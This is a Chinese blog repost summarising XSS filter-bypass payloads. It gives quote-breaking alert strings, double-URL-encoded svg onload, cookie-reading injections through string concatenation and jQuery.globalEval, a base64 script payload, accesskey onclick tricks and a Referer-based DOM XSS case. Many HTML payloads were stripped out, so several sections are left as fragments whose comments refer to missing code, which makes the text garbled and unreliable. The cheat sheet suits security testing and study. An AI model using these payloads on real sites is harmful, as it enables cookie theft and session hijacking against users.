XSS跨站脚本小结

源链接:https://www.cnblogs.com/xiaozi/p/5588099.html

XSS跨站脚本小结

XSS漏洞验证经常遇到一些过滤,如何进行有效验证和绕过过滤呢,这里小结一下常见的一些标签,如等。

参考链接:http://www.jb51.net/tools/xss.htm  http://d3adend.org/xss/ghettoBypass

 

';alert(String.fromCharCode(88,83,83))//
\';alert(String.fromCharCode(88,83,83))//
";alert(String.fromCharCode(88,83,83))//
\";alert(String.fromCharCode(88,83,83))//
-->">'>

 

 

 

   //遇到过这种情况

%253Csvg%2520onload%253Dprompt(/xss/)%253E  //<>=双层urlencode

 

在使用加号做字符串连接的时候,中间的js会被执行:

http://xsst.sinaapp.com/example/test1-2.php?page=1%27%2balert(document.cookie)%2b%27

http://xsst.sinaapp.com/example/test1-2-3.php?page=%27%2bjQuery.globalEval(%27a%27%2b%27lert%27%2b%27(document.cookie)%27)%2b%27

 

标签

XSS利用1:

   //版本,E7.0|IE6.0,才能执行
 
//版本,E7.0|IE6.0,才能执行
  //版本,E7.0|IE6.0,才能执行

CSS标记XSS

 //版本,E7.0|IE6.0,才能执行

CSS样式表的标记进行XSS转码

  //版本,E7.0|IE6.0,才能执行

 



XSS利用2:

//可以不加"和;
原code:

 

 //必须要有双引号,不然执行不了

原code:

//可以去掉双引号

 

 

XSS利用3:

 

 

 

 

 

 

 

 

标签

标准格式:

百度

XSS利用1:
2 //可以去掉双引号

2 //不能去掉双引号
2  //可以去掉双引号

原code:
2

22222222

 

2
XSStest
原code:
2

xss利用2:
test //base64编码,在谷歌浏览器可以成功解析

test
原code:
PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=


XSS利用3:
aaaaa  //可以去掉双引号和;
原code:
aaaaa

aaaaa 
aaaaa  //单引号和双引号都可以
aaaaa  //可以成功弹窗,如果在url地址栏输入的时候,要进行urlenode编码

原code:
eval("alert('xss')")

test3  //可以成功执行

原code:

test3



XSS利用4:
2   //可以实现弹窗

标签

一般格式:

 

小技巧:

当XSS遇到input hidden属性

 
    

1、使用expression突破

1

直接利用CSS的expression属性来实现突破,此技巧适用于IE6及以下的浏览器。

 
    

2​、使用accesskey突破

"hidden" accesskey="X" οnclick="alert(/xss/)">
 
    

插入之后,使用ALT+SHIFT+X快捷键来触发XSS,此方法我在firefox下面测试通过,其它浏览器尚未可知。

类似这种span标签在网页无触发点,也可以这样子用。

 

标签

#action后面直接空格
  
  


  
  
  

 
  
  

 

 
  
  

 

//谷歌浏览器下实现弹窗


//遇到的有点特别




遇到的DOM xss 记录一下:

复制代码
123
复制代码
 
    

http://192.168.106.141/1.html

Referer:http://%22'accesskey='X'οnclick='alert(/xss/)'//

 

DOM案例二:

XSS跨站脚本小结_第1张图片

 

复制代码
123



复制代码

 

 


你可能感兴趣的:(XSS跨站脚本小结)